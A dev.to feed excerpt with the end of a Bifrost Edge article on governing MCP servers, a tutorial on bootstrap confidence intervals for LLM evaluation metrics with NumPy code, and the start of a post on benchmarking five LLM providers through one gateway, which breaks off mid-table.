&lt;li&gt;  &lt;strong&gt;Detect Secrets:&lt;/strong&gt; Automatically identify and block sensitive information, such as API keys, credentials, or tokens, from being sent in prompts or extracted from responses. Bifrost includes native &lt;a href="https://docs.getbifrost.ai/enterprise/guardrails/secrets-detection" rel="noopener noreferrer"&gt;secrets detection&lt;/a&gt; powered by Gitleaks.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Enforce Custom Content Policies:&lt;/strong&gt; Implement &lt;a href="https://docs.getbifrost.ai/enterprise/guardrails/custom-regex" rel="noopener noreferrer"&gt;custom regex rules&lt;/a&gt; to prevent the transmission of specific types of PII, proprietary code, or other sensitive data unique to the organization.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Integrate Third-Party Content Safety:&lt;/strong&gt; Leverage existing investments in security tools like AWS Bedrock Guardrails, Azure Content Safety, CrowdStrike AIDR, GraySwan Cygnal, and Patronus AI, with their policies applying to MCP traffic as well.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Furthermore, all MCP server interactions governed by Bifrost Edge are captured in immutable &lt;a href="https://docs.getbifrost.ai/enterprise/audit-logs" rel="noopener noreferrer"&gt;audit logs&lt;/a&gt;. These logs provide a comprehensive, tamper-proof record of AI usage, which is essential for demonstrating compliance with regulatory requirements like SOC 2, GDPR, HIPAA, and ISO 27001.&lt;/p&gt;

&lt;h2&gt;
  
  
  Streamlined Deployment with MDM for Fleet-Wide Governance
&lt;/h2&gt;

&lt;p&gt;Deploying endpoint agents across an entire enterprise fleet can be a significant operational challenge. Bifrost Edge is designed for mass deployment through existing Mobile Device Management (MDM) platforms. This eliminates the need for manual installation or complex user-driven setup, ensuring consistent rollout and compliance.&lt;/p&gt;

&lt;p&gt;Bifrost Edge supports major MDM platforms including Jamf, Microsoft Intune, Kandji, Omnissa Workspace ONE, and JumpCloud across macOS, Windows, and Linux devices. Administrators can push the Edge agent to every machine with a managed configuration that pre-points it to the organization's Bifrost AI gateway. The first-launch flow is streamlined: silent installation, a single user sign-in via SSO in the browser to link the device to the user, and then immediate policy enforcement.&lt;/p&gt;

&lt;p&gt;This MDM-native deployment ensures that AI governance, including MCP server control, is rolled out consistently and automatically to every managed endpoint, closing shadow AI gaps efficiently.&lt;/p&gt;

&lt;h2&gt;
  
  
  The AI Gateway + Bifrost Edge Approach for Comprehensive MCP Control
&lt;/h2&gt;

&lt;p&gt;Controlling Model Context Protocol servers in an enterprise environment requires a multi-layered strategy that combines centralized policy management with endpoint enforcement. The Bifrost AI gateway serves as the control plane and policy engine, where all governance rules for AI traffic are defined. Bifrost Edge extends this same governance to every endpoint, ensuring that the AI agents and tools employees use on their machines adhere to organizational policies.&lt;/p&gt;

&lt;p&gt;This combined "AI Gateway + Bifrost Edge" approach provides unparalleled visibility into MCP server usage, granular control over permitted tools and applications, and robust security and compliance through integrated guardrails and audit logs. For organizations seeking to fully govern their AI landscape, this integrated solution provides a clear path to managing the risks and unlocking the full potential of agentic AI. Teams evaluating AI gateways can &lt;a href="https://getmaxim.ai/bifrost/book-a-demo" rel="noopener noreferrer"&gt;request a Bifrost demo&lt;/a&gt; or review the &lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;open-source repository&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Sources
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;  Bifrost Docs: Govern MCP servers (MCP governance). &lt;a href="https://docs.getbifrost.ai/edge/mcp-governance" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/mcp-governance&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  Bifrost Docs: Admin Approvals. &lt;a href="https://docs.getbifrost.ai/edge/admin-approvals" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/admin-approvals&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  Bifrost Docs: Govern AI apps (app governance). &lt;a href="https://docs.getbifrost.ai/edge/app-governance" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/app-governance&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  Bifrost Docs: Security &amp;amp; guardrails. &lt;a href="https://docs.getbifrost.ai/edge/security" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/security&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  Bifrost Docs: Deploy with MDM. &lt;a href="https://docs.getbifrost.ai/edge/deployment-mdm" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/deployment-mdm&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ai</category>
      <category>enterprise</category>
      <category>security</category>
      <category>governance</category>
    </item>
    <item>
      <title>Bootstrap confidence intervals for your LLM eval metrics</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Wed, 24 Jun 2026 06:32:50 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/bootstrap-confidence-intervals-for-your-llm-eval-metrics-3599</link>
      <guid>https://dev.to/marcuswwchen/bootstrap-confidence-intervals-for-your-llm-eval-metrics-3599</guid>
      <description>&lt;p&gt;&lt;strong&gt;TL;DR:&lt;/strong&gt; A single eval number hides its own uncertainty. Eval confidence intervals from bootstrap resampling turn a point estimate like 84.2% accuracy into a range, so you stop shipping models on a difference that is noise.&lt;/p&gt;

&lt;p&gt;Two checkpoints came back from a fine-tuning run at 84.2% and 85.7% on our 500-example agent eval set. The 1.5 point gap read like a win, and someone wanted to promote the second checkpoint to staging. Before that, I wanted eval confidence intervals on both numbers, because a 500-example set carries more sampling error than most teams admit. At 500 examples, the 95% interval on a single accuracy near 85% spans roughly 3 points on each side. The win sat well inside the noise.&lt;/p&gt;

&lt;p&gt;I lead the fine-tuning and evaluation team at Nexus Labs, and the most common mistake I see is treating an eval score as exact. It isn't. Your eval set is a sample drawn from the input space you care about, and a different 500 examples would return a different number. Confidence intervals make that variance visible.&lt;/p&gt;

&lt;h2&gt;
  
  
  What an eval confidence interval actually tells you
&lt;/h2&gt;

&lt;p&gt;An eval confidence interval is a range around a metric, like accuracy or F1, that quantifies how much the score would move if you resampled the eval set. A 95% bootstrap interval of [81.0%, 87.1%] means that across thousands of resamples of your data, 95% of the recomputed scores fell in that band. It measures sampling noise, not model quality.&lt;/p&gt;

&lt;p&gt;That distinction matters. Two checkpoints scoring 84.2% and 85.7% with overlapping intervals are, as far as your eval set can tell, indistinguishable. Card et al. showed in &lt;a href="https://aclanthology.org/2020.emnlp-main.745/" rel="noopener noreferrer"&gt;"With Little Power Comes Great Responsibility"&lt;/a&gt; that many NLP experiments are underpowered to detect the effect sizes they report.&lt;/p&gt;

&lt;h2&gt;
  
  
  Computing bootstrap confidence intervals
&lt;/h2&gt;

&lt;p&gt;The bootstrap is resampling with replacement. You take your per-example results, draw N of them with replacement many times, recompute the metric each time, and read percentiles off the resulting distribution. There's no assumption that the metric is normally distributed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;numpy&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;

&lt;span class="c1"&gt;# per-example correctness, 1 = pass, 0 = fail
&lt;/span&gt;&lt;span class="n"&gt;results&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;eval_pass_flags&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# shape (500,)
&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;bootstrap_ci&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;n_boot&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;10_000&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;alpha&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.05&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;rng&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;default_rng&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;means&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;empty&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n_boot&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n_boot&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;sample&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;rng&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;integers&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
        &lt;span class="n"&gt;means&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sample&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;mean&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;lo&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;percentile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;means&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;alpha&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;hi&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;percentile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;means&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;alpha&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;mean&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="n"&gt;lo&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;hi&lt;/span&gt;

&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;bootstrap_ci&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;results&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;  &lt;span class="c1"&gt;# (0.842, 0.806, 0.876)
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;scipy ships &lt;code&gt;scipy.stats.bootstrap&lt;/code&gt; if you'd rather not hand-roll it. For 500 examples and 10,000 resamples this runs in under a second, so there's no cost excuse to skip it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Paired bootstrap for model comparisons
&lt;/h2&gt;

&lt;p&gt;When comparing two checkpoints, don't bootstrap each interval separately and check for overlap. Overlapping intervals can still hide a real difference. Use a paired bootstrap: resample the example indices once per iteration, score both models on the same indices, and record the difference.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;paired_bootstrap&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;n_boot&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;10_000&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;rng&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;default_rng&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;diffs&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;empty&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n_boot&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n_boot&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;idx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;rng&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;integers&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;diffs&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;idx&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nf"&gt;mean&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;idx&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nf"&gt;mean&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;percentile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;diffs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mf"&gt;2.5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mf"&gt;97.5&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If that interval on the difference contains zero, you can't claim the second checkpoint is better. On our 1.5 point gap it ran from -1.9% to +4.8%. Zero is in the band, so we did not promote. Dror et al.'s &lt;a href="https://aclanthology.org/P18-1128/" rel="noopener noreferrer"&gt;"Hitchhiker's Guide to Testing Statistical Significance in NLP"&lt;/a&gt; covers when paired tests apply and which to pick.&lt;/p&gt;

&lt;h2&gt;
  
  
  How many eval examples do you need
&lt;/h2&gt;

&lt;p&gt;Interval width shrinks with the square root of N, so halving it costs four times the labeled data. At 500 examples a near-85% metric carries about plus or minus 3 points; reaching plus or minus 1.5 needs roughly 2,000 labeled examples. That is the real budgeting question for an eval set, and it's why I push for fewer, higher-quality, well-stratified examples instead of chasing a round number.&lt;/p&gt;

&lt;p&gt;For rare failure modes the picture is worse. A category with 20 examples in your set has an interval so wide it tells you almost nothing, which is how aggregate scores stay stable while a subpopulation quietly regresses.&lt;/p&gt;

&lt;h2&gt;
  
  
  Trade-offs and limitations
&lt;/h2&gt;

&lt;p&gt;The bootstrap assumes your eval examples are independent and drawn from the distribution you care about. If they cluster (multiple turns from one conversation, or near-duplicate prompts), the effective sample size is smaller than N and your interval comes out too narrow. Dedup first.&lt;/p&gt;

&lt;p&gt;It also only measures sampling noise. It says nothing about label error, distribution shift between your eval set and production traffic, or a judge model that's miscalibrated. A tight interval on a biased metric is still wrong, only now you're confident in it. For very low pass rates the percentile bootstrap can misbehave; bias-corrected and accelerated (BCa) intervals are better there but slower to compute.&lt;/p&gt;

&lt;h2&gt;
  
  
  Wrapping up
&lt;/h2&gt;

&lt;p&gt;Eval confidence intervals are the cheapest reliability upgrade available to an ML team. A dozen lines of NumPy turns every score into a score plus a band, and the band is usually wider than the gap you were about to ship on. Next time a checkpoint wins by a point or two, run the paired bootstrap before you tell anyone. The honest answer is often "we can't tell yet, label more data."&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Card et al., &lt;a href="https://aclanthology.org/2020.emnlp-main.745/" rel="noopener noreferrer"&gt;"With Little Power Comes Great Responsibility"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Dror et al., &lt;a href="https://aclanthology.org/P18-1128/" rel="noopener noreferrer"&gt;"The Hitchhiker's Guide to Testing Statistical Significance in NLP"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.bootstrap.html" rel="noopener noreferrer"&gt;scipy.stats.bootstrap documentation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>machinelearning</category>
      <category>llm</category>
    </item>
    <item>
      <title>Benchmarking 5 LLM providers on one eval set, no SDK per vendor</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Tue, 23 Jun 2026 16:01:10 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/benchmarking-5-llm-providers-on-one-eval-set-no-sdk-per-vendor-2j6g</link>
      <guid>https://dev.to/marcuswwchen/benchmarking-5-llm-providers-on-one-eval-set-no-sdk-per-vendor-2j6g</guid>
      <description>&lt;p&gt;&lt;strong&gt;TL;DR: We run a 1,200-case eval suite for enterprise agent automation at Nexus Labs. Comparing models across OpenAI, Anthropic, Bedrock, Vertex, and Groq used to mean five client libraries and five sets of retry logic. We put Bifrost in front of all of them and now the harness talks to one OpenAI-compatible endpoint. Here's what that bought us, and where it didn't help.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The problem was never the models
&lt;/h2&gt;

&lt;p&gt;Our eval set is 1,200 cases. Tool-call traces, multi-turn agent transcripts, graded against a rubric. The grading is hard. The models are not the hard part.&lt;/p&gt;

&lt;p&gt;The hard part was the plumbing around the models. Every time we wanted to score a new candidate, the code branched. &lt;code&gt;openai.ChatCompletion&lt;/code&gt; for GPT-4o. &lt;code&gt;anthropic.messages&lt;/code&gt; for Claude. The &lt;code&gt;boto3&lt;/code&gt; Bedrock runtime for the Llama variants. Vertex had its own auth dance with service accounts. Groq was OpenAI-shaped but pointed at a different base URL with its own rate limits.&lt;/p&gt;

&lt;p&gt;Five providers. Five SDKs. Five retry policies, all written slightly differently by whoever added that provider. When a Vertex call 429'd at case 800 of a run, the harness handled it differently than when Anthropic did. So our results carried noise that had nothing to do with model quality.&lt;/p&gt;

&lt;h2&gt;
  
  
  One endpoint, five backends
&lt;/h2&gt;

&lt;p&gt;Bifrost is a gateway. It speaks one OpenAI-compatible API and routes to 23+ providers behind it. We run it self-hosted, Docker, on a single box next to the eval workers.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;-p&lt;/span&gt; 8080:8080 maximhq/bifrost
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The harness stopped importing vendor SDKs. It points the OpenAI client at &lt;code&gt;localhost:8080/v1&lt;/code&gt; and changes the &lt;code&gt;model&lt;/code&gt; string. That's the whole switch.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;openai&lt;/span&gt;
&lt;span class="n"&gt;client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;openai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;OpenAI&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;base_url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;http://localhost:8080/v1&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;api_key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;unused&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;model&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;openai/gpt-4o&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;anthropic/claude-sonnet-4-6&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
              &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;bedrock/llama-3.3-70b&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;vertex/gemini-2.0&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
              &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;groq/llama-3.3-70b&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;case&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;eval_set&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;           &lt;span class="c1"&gt;# 1,200 cases
&lt;/span&gt;        &lt;span class="n"&gt;resp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;chat&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;completions&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;case&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;record&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;case&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;resp&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The retry and fallback logic moved out of our Python and into the gateway config. One policy, applied to every provider, documented in &lt;a href="https://docs.getbifrost.ai/features/retries-and-fallbacks" rel="noopener noreferrer"&gt;retries and fallbacks&lt;/a&gt;. When Vertex 429s now, every provider gets the same backoff. The eval results stopped carrying our plumbing's personality.&lt;/p&gt;

&lt;h2&gt;
  
  
  What it changed, with numbers
&lt;/h2&gt;

&lt;p&gt;A full sweep is 1,200 cases × 5 models = 6,000 calls. Before, a sweep failed partway maybe one run in three, usually a provider-specific timeout we hadn't normalized. We babysat it.&lt;/p&gt;

&lt;p&gt;After, the gateway's load balancing across multiple API keys per provider cut our 429 retries enough that a clean sweep became the default. We added a second OpenAI key and a second Anthropic key to the config; Bifrost distributes across them. No code change.&lt;/p&gt;

&lt;p&gt;Semantic caching helped less than I expected and more than I'd have guessed. Roughly 18% of our cases are near-duplicate prompts (same system prompt, tiny input deltas). &lt;a href="https://docs.getbifrost.ai/features/semantic-caching" rel="noopener noreferrer"&gt;Semantic caching&lt;/a&gt; served those on repeat runs. On a re-run after a rubric tweak, that shaved real wall-clock and provider spend. On a first run, zero benefit. Obvious in hindsight.&lt;/p&gt;

&lt;h2&gt;
  
  
  How it stacks up against the alternatives
&lt;/h2&gt;

&lt;p&gt;We looked at LiteLLM and Portkey first. Both are good. The honest comparison:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Concern&lt;/th&gt;
&lt;th&gt;Bifrost&lt;/th&gt;
&lt;th&gt;LiteLLM&lt;/th&gt;
&lt;th&gt;Portkey&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Deployment&lt;/td&gt;
&lt;td&gt;Self-host, Go binary&lt;/td&gt;
&lt;td&gt;Self-host, Python proxy&lt;/td&gt;
&lt;td&gt;Managed SaaS (self-host limited)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OpenAI-compatible API&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
